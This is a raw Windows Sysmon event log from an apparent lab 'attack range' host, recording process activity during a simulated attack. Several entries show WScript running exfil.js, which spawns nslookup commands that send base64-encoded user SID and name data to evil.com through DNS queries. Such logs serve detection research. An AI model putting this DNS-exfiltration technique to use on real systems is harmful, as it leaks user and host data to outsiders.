14:16:40.344{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7441-000000005F02}7204C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.344{2E1864BB-17C8-629A-7441-000000005F02}72047224C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7341-000000005F02}6432C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.344{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7441-000000005F02}7204C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.340{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.340{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.340{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.340{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.340{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7341-000000005F02}6432C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.339{2E1864BB-17A1-629A-783D-000000005F02}55527176C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-7341-000000005F02}6432C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.339{2E1864BB-17C8-629A-7341-000000005F02}6432C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlljiiz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.323{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhxyez.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.307{2E1864BB-17C8-629A-7141-000000005F02}60083956C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7241-000000005F02}1080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.291{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.291{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.291{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.291{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.291{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7241-000000005F02}1080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.291{2E1864BB-17C8-629A-7041-000000005F02}21045352C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-7241-000000005F02}1080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.302{2E1864BB-17C8-629A-7241-000000005F02}1080C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-7041-000000005F02}2104C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhxyez.tmp 2>&1 10341000x8000000000000000202883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.276{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7141-000000005F02}6008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.276{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7141-000000005F02}6008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.276{2E1864BB-17C8-629A-7141-000000005F02}60083956C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7041-000000005F02}2104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.260{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7141-000000005F02}6008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.244{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.244{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.244{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.244{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7041-000000005F02}2104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.244{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.244{2E1864BB-17A1-629A-783D-000000005F02}55525776C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-7041-000000005F02}2104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.256{2E1864BB-17C8-629A-7041-000000005F02}2104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhxyez.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.244{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllizop.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.206{2E1864BB-17C8-629A-6E41-000000005F02}42124100C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-6F41-000000005F02}6888C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 